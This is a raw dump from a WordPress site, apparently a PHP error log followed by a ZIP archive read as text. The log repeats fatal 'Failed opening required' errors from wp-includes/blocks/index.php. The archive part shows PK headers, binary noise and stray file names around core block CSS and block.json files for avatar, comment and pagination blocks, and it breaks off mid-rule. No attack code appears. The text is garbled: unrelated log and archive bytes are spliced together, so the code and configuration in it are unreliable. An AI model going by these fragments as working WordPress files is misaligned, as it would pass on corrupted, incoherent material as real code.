undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [21-May-2025 09:19:49 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [21-May-2025 09:19:49 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [21-May-2025 20:05:53 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [21-May-2025 20:05:53 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [21-May-2025 20:05:53 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [21-May-2025 20:05:53 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [22-May-2025 05:59:11 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [22-May-2025 05:59:11 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [22-May-2025 05:59:11 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [22-May-2025 05:59:11 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [27-May-2025 23:56:53 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [27-May-2025 23:56:53 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [27-May-2025 23:56:53 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [27-May-2025 23:56:53 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [12-Jun-2025 14:15:14 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [12-Jun-2025 14:15:14 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [12-Jun-2025 14:15:14 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [12-Jun-2025 14:15:14 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [12-Jun-2025 14:17:09 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [12-Jun-2025 14:17:09 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [12-Jun-2025 14:17:09 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [12-Jun-2025 14:17:09 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [24-Jun-2025 09:46:04 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [24-Jun-2025 09:46:04 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [24-Jun-2025 09:46:04 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [24-Jun-2025 09:46:04 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 PK6[ latest.phpnu[PK6[tag.phpnu[PK6[ .1738303120nu[PK6[Ϲ;wwavatar/editor.min.cssnu[.wp-block-avatar__image img{width:100%}.wp-block-avatar.aligncenter .components-resizable-box__container{margin:0 auto}PK6[Yavatar/style-rtl.min.cssnu[.wp-block-avatar{line-height:0}.wp-block-avatar,.wp-block-avatar img{box-sizing:border-box}.wp-block-avatar.aligncenter{text-align:center}PK6[E\..avatar/block.jsonnu[{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "core/avatar", "title": "Avatar", "category": "theme", "description": "Add a user’s avatar.", "textdomain": "default", "attributes": { "userId": { "type": "number" }, "size": { "type": "number", "default": 96 }, "isLink": { "type": "boolean", "default": false }, "linkTarget": { "type": "string", "default": "_self" } }, "usesContext": [ "postType", "postId", "commentId" ], "supports": { "html": false, "align": true, "alignWide": false, "spacing": { "margin": true, "padding": true }, "__experimentalBorder": { "__experimentalSkipSerialization": true, "radius": true, "width": true, "color": true, "style": true, "__experimentalDefaultControls": { "radius": true } }, "color": { "text": false, "background": false, "__experimentalDuotone": "img" } }, "selectors": { "border": ".wp-block-avatar img" }, "editorStyle": "wp-block-avatar-editor", "style": "wp-block-avatar" } PK6[T$avatar/editor.cssnu[.wp-block-avatar__image img{ width:100%; } .wp-block-avatar.aligncenter .components-resizable-box__container{ margin:0 auto; }PK6[Yavatar/style.min.cssnu[.wp-block-avatar{line-height:0}.wp-block-avatar,.wp-block-avatar img{box-sizing:border-box}.wp-block-avatar.aligncenter{text-align:center}PK6[T$avatar/editor-rtl.cssnu[.wp-block-avatar__image img{ width:100%; } .wp-block-avatar.aligncenter .components-resizable-box__container{ margin:0 auto; }PK6[Ϲ;wwavatar/editor-rtl.min.cssnu[.wp-block-avatar__image img{width:100%}.wp-block-avatar.aligncenter .components-resizable-box__container{margin:0 auto}PK6[X0avatar/style-rtl.cssnu[.wp-block-avatar{ line-height:0; } .wp-block-avatar,.wp-block-avatar img{ box-sizing:border-box; } .wp-block-avatar.aligncenter{ text-align:center; }PK6[X0avatar/style.cssnu[.wp-block-avatar{ line-height:0; } .wp-block-avatar,.wp-block-avatar img{ box-sizing:border-box; } .wp-block-avatar.aligncenter{ text-align:center; }PK6[44%comment-author-name/style-rtl.min.cssnu[.wp-block-comment-author-name{box-sizing:border-box}PK6[?Errcomment-author-name/block.jsonnu[{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "core/comment-author-name", "title": "Comment Author Name", "category": "theme", "ancestor": [ "core/comment-template" ], "description": "Displays the name of the author of the comment.", "textdomain": "default", "attributes": { "isLink": { "type": "boolean", "default": true }, "linkTarget": { "type": "string", "default": "_self" }, "textAlign": { "type": "string" } }, "usesContext": [ "commentId" ], "supports": { "html": false, "spacing": { "margin": true, "padding": true }, "color": { "gradients": true, "link": true, "__experimentalDefaultControls": { "background": true, "text": true, "link": true } }, "typography": { "fontSize": true, "lineHeight": true, "__experimentalFontFamily": true, "__experimentalFontWeight": true, "__experimentalFontStyle": true, "__experimentalTextTransform": true, "__experimentalTextDecoration": true, "__experimentalLetterSpacing": true, "__experimentalDefaultControls": { "fontSize": true } } } } PK6[44!comment-author-name/style.min.cssnu[.wp-block-comment-author-name{box-sizing:border-box}PK6[mk99!comment-author-name/style-rtl.cssnu[.wp-block-comment-author-name{ box-sizing:border-box; }PK6[mk99comment-author-name/style.cssnu[.wp-block-comment-author-name{ box-sizing:border-box; }PK7[ F?LL!comment-content/style-rtl.min.cssnu[.comment-awaiting-moderation{display:block;font-size:.875em;line-height:1.5}PK7[R{comment-content/block.jsonnu[{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "core/comment-content", "title": "Comment Content", "category": "theme", "ancestor": [ "core/comment-template" ], "description": "Displays the contents of a comment.", "textdomain": "default", "usesContext": [ "commentId" ], "attributes": { "textAlign": { "type": "string" } }, "supports": { "color": { "gradients": true, "link": true, "__experimentalDefaultControls": { "background": true, "text": true } }, "typography": { "fontSize": true, "lineHeight": true, "__experimentalFontFamily": true, "__experimentalFontWeight": true, "__experimentalFontStyle": true, "__experimentalTextTransform": true, "__experimentalTextDecoration": true, "__experimentalLetterSpacing": true, "__experimentalDefaultControls": { "fontSize": true } }, "spacing": { "padding": [ "horizontal", "vertical" ], "__experimentalDefaultControls": { "padding": true } }, "html": false } } PK7[ F?LLcomment-content/style.min.cssnu[.comment-awaiting-moderation{display:block;font-size:.875em;line-height:1.5}PK7[߅lWWcomment-content/style-rtl.cssnu[.comment-awaiting-moderation{ display:block; font-size:.875em; line-height:1.5; }PK7[߅lWWcomment-content/style.cssnu[.comment-awaiting-moderation{ display:block; font-size:.875em; line-height:1.5; }PK7[ --comment-date/style-rtl.min.cssnu[.wp-block-comment-date{box-sizing:border-box}PK7[Q]""comment-date/block.jsonnu[{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "core/comment-date", "title": "Comment Date", "category": "theme", "ancestor": [ "core/comment-template" ], "description": "Displays the date on which the comment was posted.", "textdomain": "default", "attributes": { "format": { "type": "string" }, "isLink": { "type": "boolean", "default": true } }, "usesContext": [ "commentId" ], "supports": { "html": false, "color": { "gradients": true, "link": true, "__experimentalDefaultControls": { "background": true, "text": true, "link": true } }, "spacing": { "margin": true, "padding": true }, "typography": { "fontSize": true, "lineHeight": true, "__experimentalFontFamily": true, "__experimentalFontWeight": true, "__experimentalFontStyle": true, "__experimentalTextTransform": true, "__experimentalTextDecoration": true, "__experimentalLetterSpacing": true, "__experimentalDefaultControls": { "fontSize": true } } } } PK7[ --comment-date/style.min.cssnu[.wp-block-comment-date{box-sizing:border-box}PK7[$8022comment-date/style-rtl.cssnu[.wp-block-comment-date{ box-sizing:border-box; }PK7[$8022comment-date/style.cssnu[.wp-block-comment-date{ box-sizing:border-box; }PK7[5)22#comment-edit-link/style-rtl.min.cssnu[.wp-block-comment-edit-link{box-sizing:border-box}PK7[e*Ucomment-edit-link/block.jsonnu[{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "core/comment-edit-link", "title": "Comment Edit Link", "category": "theme", "ancestor": [ "core/comment-template" ], "description": "Displays a link to edit the comment in the WordPress Dashboard. This link is only visible to users with the edit comment capability.", "textdomain": "default", "usesContext": [ "commentId" ], "attributes": { "linkTarget": { "type": "string", "default": "_self" }, "textAlign": { "type": "string" } }, "supports": { "html": false, "color": { "link": true, "gradients": true, "text": false, "__experimentalDefaultControls": { "background": true, "link": true } }, "spacing": { "margin": true, "padding": true }, "typography": { "fontSize": true, "lineHeight": true, "__experimentalFontFamily": true, "__experimentalFontWeight": true, "__experimentalFontStyle": true, "__experimentalTextTransform": true, "__experimentalTextDecoration": true, "__experimentalLetterSpacing": true, "__experimentalDefaultControls": { "fontSize": true } } } } PK7[5)22comment-edit-link/style.min.cssnu[.wp-block-comment-edit-link{box-sizing:border-box}PK7[n77comment-edit-link/style-rtl.cssnu[.wp-block-comment-edit-link{ box-sizing:border-box; }PK7[n77comment-edit-link/style.cssnu[.wp-block-comment-edit-link{ box-sizing:border-box; }PK7['qq33$comment-reply-link/style-rtl.min.cssnu[.wp-block-comment-reply-link{box-sizing:border-box}PK7[$comment-reply-link/block.jsonnu[{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "core/comment-reply-link", "title": "Comment Reply Link", "category": "theme", "ancestor": [ "core/comment-template" ], "description": "Displays a link to reply to a comment.", "textdomain": "default", "usesContext": [ "commentId" ], "attributes": { "textAlign": { "type": "string" } }, "supports": { "color": { "gradients": true, "link": true, "text": false, "__experimentalDefaultControls": { "background": true, "link": true } }, "spacing": { "margin": true, "padding": true }, "typography": { "fontSize": true, "lineHeight": true, "__experimentalFontFamily": true, "__experimentalFontWeight": true, "__experimentalFontStyle": true, "__experimentalTextTransform": true, "__experimentalTextDecoration": true, "__experimentalLetterSpacing": true, "__experimentalDefaultControls": { "fontSize": true } }, "html": false } } PK7['qq33 comment-reply-link/style.min.cssnu[.wp-block-comment-reply-link{box-sizing:border-box}PK7[!ޡ88 comment-reply-link/style-rtl.cssnu[.wp-block-comment-reply-link{ box-sizing:border-box; }PK7[!ޡ88comment-reply-link/style.cssnu[.wp-block-comment-reply-link{ box-sizing:border-box; }PK7[h"comment-template/style-rtl.min.cssnu[.wp-block-comment-template{box-sizing:border-box;list-style:none;margin-bottom:0;max-width:100%;padding:0}.wp-block-comment-template li{clear:both}.wp-block-comment-template ol{list-style:none;margin-bottom:0;max-width:100%;padding-right:2rem}.wp-block-comment-template.alignleft{float:right}.wp-block-comment-template.aligncenter{margin-left:auto;margin-right:auto;width:-moz-fit-content;width:fit-content}.wp-block-comment-template.alignright{float:left}PK7[%vcomment-template/block.jsonnu[{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "core/comment-template", "title": "Comment Template", "category": "design", "parent": [ "core/comments" ], "description": "Contains the block elements used to display a comment, like the title, date, author, avatar and more.", "textdomain": "default", "usesContext": [ "postId" ], "supports": { "align": true, "html": false, "reusable": false, "spacing": { "margin": true, "padding": true }, "typography": { "fontSize": true, "lineHeight": true, "__experimentalFontFamily": true, "__experimentalFontWeight": true, "__experimentalFontStyle": true, "__experimentalTextTransform": true, "__experimentalTextDecoration": true, "__experimentalLetterSpacing": true, "__experimentalDefaultControls": { "fontSize": true } } }, "style": "wp-block-comment-template" } PK7[ב comment-template/style.min.cssnu[.wp-block-comment-template{box-sizing:border-box;list-style:none;margin-bottom:0;max-width:100%;padding:0}.wp-block-comment-template li{clear:both}.wp-block-comment-template ol{list-style:none;margin-bottom:0;max-width:100%;padding-left:2rem}.wp-block-comment-template.alignleft{float:left}.wp-block-comment-template.aligncenter{margin-left:auto;margin-right:auto;width:-moz-fit-content;width:fit-content}.wp-block-comment-template.alignright{float:right}PK7['?=  comment-template/style-rtl.cssnu[.wp-block-comment-template{ box-sizing:border-box; list-style:none; margin-bottom:0; max-width:100%; padding:0; } .wp-block-comment-template li{ clear:both; } .wp-block-comment-template ol{ list-style:none; margin-bottom:0; max-width:100%; padding-right:2rem; } .wp-block-comment-template.alignleft{ float:right; } .wp-block-comment-template.aligncenter{ margin-left:auto; margin-right:auto; width:-moz-fit-content; width:fit-content; } .wp-block-comment-template.alignright{ float:left; }PK7[h.wp-block-comments-pagination{justify-content:center}.editor-styles-wrapper .wp-block-comments-pagination{max-width:100%}.editor-styles-wrapper .wp-block-comments-pagination.block-editor-block-list__layout{margin:0}.wp-block-comments-pagination>.wp-block-comments-pagination-next,.wp-block-comments-pagination>.wp-block-comments-pagination-numbers,.wp-block-comments-pagination>.wp-block-comments-pagination-previous{margin:.5em .5em .5em 0}.wp-block-comments-pagination>.wp-block-comments-pagination-next:last-child,.wp-block-comments-pagination>.wp-block-comments-pagination-numbers:last-child,.wp-block-comments-pagination>.wp-block-comments-pagination-previous:last-child{margin-right:0}PK7[-%comments-pagination/style-rtl.min.cssnu[.wp-block-comments-pagination>.wp-block-comments-pagination-next,.wp-block-comments-pagination>.wp-block-comments-pagination-numbers,.wp-block-comments-pagination>.wp-block-comments-pagination-previous{margin-bottom:.5em;margin-right:.5em}.wp-block-comments-pagination>.wp-block-comments-pagination-next:last-child,.wp-block-comments-pagination>.wp-block-comments-pagination-numbers:last-child,.wp-block-comments-pagination>.wp-block-comments-pagination-previous:last-child{margin-right:0}.wp-block-comments-pagination .wp-block-comments-pagination-previous-arrow{display:inline-block;margin-left:1ch}.wp-block-comments-pagination .wp-block-comments-pagination-previous-arrow:not(.is-arrow-chevron){transform:scaleX(-1)}.wp-block-comments-pagination .wp-block-comments-pagination-next-arrow{display:inline-block;margin-right:1ch}.wp-block-comments-pagination .wp-block-comments-pagination-next-arrow:not(.is-arrow-chevron){transform:scaleX(-1)}.wp-block-comments-pagination.aligncenter{justify-content:center}PK7[VvUcomments-pagination/block.jsonnu[{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "core/comments-pagination", "title": "Comments Pagination", "category": "theme", "parent": [ "core/comments" ], "description": "Displays a paginated navigation to next/previous set of comments, when applicable.", "textdomain": "default", "attributes": { "paginationArrow": { "type": "string", "default": "none" } }, "providesContext": { "comments/paginationArrow": "paginationArrow" }, "supports": { "align": true, "reusable": false, "html": false, "color": { "gradients": true, "link": true, "__experimentalDefaultControls": { "background": true, "text": true, "link": true } }, "layout": { "allowSwitching": false, "allowInheriting": false, "default": { "type": "flex" } }, "typography": { "fontSize": true, "lineHeight": true, "__experimentalFontFamily": true, "__experimentalFontWeight": true, "__experimentalFontStyle": true, "__experimentalTextTransform": true, "__experimentalTextDecoration": true, "__experimentalLetterSpacing": true, "__experimentalDefaultControls": { "fontSize": true } } }, "editorStyle": "wp-block-comments-pagination-editor", "style": "wp-block-comments-pagination" } PK7[K comments-pagination/editor.cssnu[.wp-block[data-align=center]>.wp-block-comments-pagination{ justify-content:center; } .editor-styles-wrapper .wp-block-comments-pagination{ max-width:100%; } .editor-styles-wrapper .wp-block-comments-pagination.block-editor-block-list__layout{ margin:0; } .wp-block-comments-pagination>.wp-block-comments-pagination-next,.wp-block-comments-pagination>.wp-block-comments-pagination-numbers,.wp-block-comments-pagination>.wp-block-comments-pagination-previous{ margin:.5em .5em .5em 0; } .wp-block-comments-pagination>.wp-block-comments-pagination-next:last-child,.wp-block-comments-pagination>.wp-block-comments-pagination-numbers:last-child,.wp-block-comments-pagination>.wp-block-comments-pagination-previous:last-child{ margin-right:0; }PK7[ϯ!comments-pagination/style.min.cssnu[.wp-block-comments-pagination>.wp-block-comments-pagination-next,.wp-block-comments-pagination>.wp-block-comments-pagination-numbers,.wp-block-comments-pagination>.wp-block-comments-pagination-previous{margin-bottom:.5em;margin-right:.5em}.wp-block-comments-pagination>.wp-block-comments-pagination-next:last-child,.wp-block-comments-pagination>.wp-block-comments-pagination-numbers:last-child,.wp-block-comments-pagination>.wp-block-comments-pagination-previous:last-child{margin-right:0}.wp-block-comments-pagination .wp-block-comments-pagination-previous-arrow{display:inline-block;margin-right:1ch}.wp-block-comments-pagination .wp-block-comments-pagination-previous-arrow:not(.is-arrow-chevron){transform:scaleX(1)}.wp-block-comments-pagination .wp-block-comments-pagination-next-arrow{display:inline-block;margin-left:1ch}.wp-block-comments-pagination .wp-block-comments-pagination-next-arrow:not(.is-arrow-chevron){transform:scaleX(1)}.wp-block-comments-pagination.aligncenter{justify-content:center}PK7[N*"comments-pagination/editor-rtl.cssnu[.wp-block[data-align=center]>.wp-block-comments-pagination{ justify-content:center; } .editor-styles-wrapper .wp-block-comments-pagination{ max-width:100%; } .editor-styles-wrapper .wp-block-comments-pagination.block-editor-block-list__layout{ margin:0; } .wp-block-comments-pagination>.wp-block-comments-pagination-next,.wp-block-comments-pagination>.wp-block-comments-pagination-numbers,.wp-block-comments-pagination>.wp-block-comments-pagination-previous{ margin-bottom:.5em; margin-right:.5em; margin-top:.5em; } .wp-block-comments-pagination>.wp-block-comments-pagination-next:last-child,.wp-block-comments-pagination>.wp-block-comments-pagination-numbers:last-child,.wp-block-comments-pagination>.wp-block-comments-pagination-previous:last-child{ margin-right:0; }PK7[e&comments-pagination/editor-rtl.min.cssnu[.wp-block[data-align=center]>.wp-block-comments-pagination{justify-content:center}.editor-styles-wrapper .wp-block-comments-pagination{max-width:100%}.editor-styles-wrapper .wp-block-comments-pagination.block-editor-block-list__layout{margin:0}.wp-block-comments-pagination>.wp-block-comments-pagination-next,.wp-block-comments-pagination>.wp-block-comments-pagination-numbers,.wp-block-comments-pagination>.wp-block-comments-pagination-previous{margin-bottom:.5em;margin-right:.5em;margin-top:.5em}.wp-block-comments-pagination>.wp-block-comments-pagination-next:last-child,.wp-block-comments-pagination>.wp-block-comments-pagination-numbers:last-child,.wp-block-comments-pagination>.wp-block-comments-pagination-previous:last-child{margin-right:0}PK7[5%%!comments-pagination/style-rtl.cssnu[.wp-block-comments-pagination>.wp-block-comments-pagination-next,.wp-block-comments-pagination>.wp-block-comments-pagination-numbers,.wp-block-comments-pagination>.wp-block-comments-pagination-previous{ margin-bottom:.5em; margin-right:.5em; } .wp-block-comments-pagination>.wp-block-comments-pagination-next:last-child,.wp-block-comments-pagination>.wp-block-comments-pagination-numbers:last-child,.wp-block-comments-pagination>.wp-block-comments-pagination-previous:last-child{ margin-right:0; } .wp-block-comments-pagination .wp-block-comments-pagination-previous-arrow{ display:inline-block; margin-left:1ch; } .wp-block-comments-pagination .wp-block-comments-pagination-previous-arrow:not(.is-arrow-chevron){ transform:scaleX(-1);; } .wp-block-comments-pagination .wp-block-comments-pagination-next-arrow{ display:inline-block; margin-right:1ch; } .wp-block-comments-pagination .wp-block-comments-pagination-next-arrow:not(.is-arrow-chevron){ transform:scaleX(-1);; } .wp-block-comments-pagination.aligncenter{ justify-content:center; }PK7[^3!!comments-pagination/style.cssnu[.wp-block-comments-pagination>.wp-block-comments-pagination-next,.wp-block-comments-pagination>.wp-block-comments-pagination-numbers,.wp-block-comments-pagination>.wp-block-comments-pagination-previous{ margin-bottom:.5em; margin-right:.5em; } .wp-block-comments-pagination>.wp-block-comments-pagination-next:last-child,.wp-block-comments-pagination>.wp-block-comments-pagination-numbers:last-child,.wp-block-comments-pagination>.wp-block-comments-pagination-previous:last-child{ margin-right:0; } .wp-block-comments-pagination .wp-block-comments-pagination-previous-arrow{ display:inline-block; margin-right:1ch; } .wp-block-comments-pagination .wp-block-comments-pagination-previous-arrow:not(.is-arrow-chevron){ transform:scaleX(1); } .wp-block-comments-pagination .wp-block-comments-pagination-next-arrow{ display:inline-block; margin-left:1ch; } .wp-block-comments-pagination .wp-block-comments-pagination-next-arrow:not(.is-arrow-chevron){ transform:scaleX(1); } .wp-block-comments-pagination.aligncenter{ justify-content:center; }PK7[N@#comments-pagination-next/block.jsonnu[{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "core/comments-pagination-next", "title": "Comments Next Page", "category": "theme", "parent": [ "core/comments-pagination" ], "description": "Displays the next comment's page link.", "textdomain": "default", "attributes": { "label": { "type": "string" } }, "usesContext": [ "postId", "comments/paginationArrow" ], "supports": { "reusable": false, "html": false, "color": { "gradients": true, "text": false, "__experimentalDefaultControls": { "background": true } }, "typography": { "fontSize": true, "lineHeight": true, "__experimentalFontFamily": true, "__experimentalFontWeight": true, "__experimentalFontStyle": true, "__experimentalTextTransform": true, "__experimentalTextDecoration": true, "__experimentalLetterSpacing": true, "__experimentalDefaultControls": { "fontSize": true } } } } PK7[ڕ*comments-pagination-numbers/editor.min.cssnu[.wp-block-comments-pagination-numbers a{text-decoration:underline}.wp-block-comments-pagination-numbers .page-numbers{margin-right:2px}.wp-block-comments-pagination-numbers .page-numbers:last-child{margin-right:0}PK7[&C&comments-pagination-numbers/block.jsonnu[{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "core/comments-pagination-numbers", "title": "Comments Page Numbers", "category": "theme", "parent": [ "core/comments-pagination" ], "description": "Displays a list of page numbers for comments pagination.", "textdomain": "default", "usesContext": [ "postId" ], "supports": { "reusable": false, "html": false, "color": { "gradients": true, "text": false, "__experimentalDefaultControls": { "background": true } }, "typography": { "fontSize": true, "lineHeight": true, "__experimentalFontFamily": true, "__experimentalFontWeight": true, "__experimentalFontStyle": true, "__experimentalTextTransform": true, "__experimentalTextDecoration": true, "__experimentalLetterSpacing": true, "__experimentalDefaultControls": { "fontSize": true } } } } PK7[ &comments-pagination-numbers/editor.cssnu[.wp-block-comments-pagination-numbers a{ text-decoration:underline; } .wp-block-comments-pagination-numbers .page-numbers{ margin-right:2px; } .wp-block-comments-pagination-numbers .page-numbers:last-child{ margin-right:0; }PK7[lA*comments-pagination-numbers/editor-rtl.cssnu[.wp-block-comments-pagination-numbers a{ text-decoration:underline; } .wp-block-comments-pagination-numbers .page-numbers{ margin-left:2px; } .wp-block-comments-pagination-numbers .page-numbers:last-child{ margin-right:0; }PK7[E.comments-pagination-numbers/editor-rtl.min.cssnu[.wp-block-comments-pagination-numbers a{text-decoration:underline}.wp-block-comments-pagination-numbers .page-numbers{margin-left:2px}.wp-block-comments-pagination-numbers .page-numbers:last-child{margin-right:0}PK7[3/'comments-pagination-previous/block.jsonnu[{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "core/comments-pagination-previous", "title": "Comments Previous Page", "category": "theme", "parent": [ "core/comments-pagination" ], "description": "Displays the previous comment's page link.", "textdomain": "default", "attributes": { "label": { "type": "string" } }, "usesContext": [ "postId", "comments/paginationArrow" ], "supports": { "reusable": false, "html": false, "color": { "gradients": true, "text": false, "__experimentalDefaultControls": { "background": true } }, "typography": { "fontSize": true, "lineHeight": true, "__experimentalFontFamily": true, "__experimentalFontWeight": true, "__experimentalFontStyle": true, "__experimentalTextTransform": true, "__experimentalTextDecoration": true, "__experimentalLetterSpacing": true, "__experimentalDefaultControls": { "fontSize": true } } } } PK7[*z88comments-title/editor.min.cssnu[.wp-block-comments-title.has-background{padding:inherit}PK7[لcomments-title/block.jsonnu[{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "core/comments-title", "title": "Comments Title", "category": "theme", "ancestor": [ "core/comments" ], "description": "Displays a title with the number of comments", "textdomain": "default", "usesContext": [ "postId", "postType" ], "attributes": { "textAlign": { "type": "string" }, "showPostTitle": { "type": "boolean", "default": true }, "showCommentsCount": { "type": "boolean", "default": true }, "level": { "type": "number", "default": 2 } }, "supports": { "anchor": false, "align": true, "html": false, "__experimentalBorder": { "radius": true, "color": true, "width": true, "style": true }, "color": { "gradients": true, "__experimentalDefaultControls": { "background": true, "text": true } }, "spacing": { "margin": true, "padding": true }, "typography": { "fontSize": true, "lineHeight": true, "__experimentalFontFamily": true, "__experimentalFontWeight": true, "__experimentalFontStyle": true, "__experimentalTextTransform": true, "__experimentalTextDecoration": true, "__experimentalLetterSpacing": true, "__experimentalDefaultControls": { "fontSize": true, "__experimentalFontFamily": true, "__experimentalFontStyle": true, "__experimentalFontWeight": true } } } } PK7[I==comments-title/editor.cssnu[.wp-block-comments-title.has-background{ padding:inherit; }PK7[I==comments-title/editor-rtl.cssnu[.wp-block-comments-title.has-background{ padding:inherit; }PK7[*z88!comments-title/editor-rtl.min.cssnu[.wp-block-comments-title.has-background{padding:inherit}PK7[cover/editor.min.cssnu[.editor-styles-wrapper .wp-block-cover{box-sizing:border-box}.wp-block-cover.is-placeholder{align-items:stretch;display:flex;min-height:240px;padding:0!important}.wp-block-cover.is-placeholder .components-placeholder.is-large{justify-content:flex-start;z-index:1}.wp-block-cover.is-placeholder:focus:after{min-height:auto}.wp-block-cover.components-placeholder h2{color:inherit}.wp-block-cover.is-transient:before{background-color:#fff;opacity:.3}.wp-block-cover .components-spinner{left:50%;margin:0;position:absolute;top:50%;transform:translate(-50%,-50%);z-index:1}.wp-block-cover .wp-block-cover__inner-container{margin-left:0;margin-right:0;text-align:left}.wp-block-cover .wp-block-cover__placeholder-background-options{width:100%}.wp-block-cover .wp-block-cover__image--placeholder-image{bottom:0;left:0;position:absolute;right:0;top:0}[data-align=left]>.wp-block-cover,[data-align=right]>.wp-block-cover{max-width:420px;width:100%}.block-library-cover__reset-button{margin-left:auto}.block-library-cover__resize-container{bottom:0;left:0;min-height:50px;position:absolute!important;right:0;top:0}.components-popover.block-editor-block-popover.block-library-cover__resizable-box-popover .block-library-cover__resize-container,.components-popover.block-editor-block-popover.block-library-cover__resizable-box-popover .components-popover__content>div{overflow:visible;pointer-events:none}.wp-block-cover>.components-drop-zone .components-drop-zone__content{opacity:.8!important}.block-editor-block-patterns-list__list-item 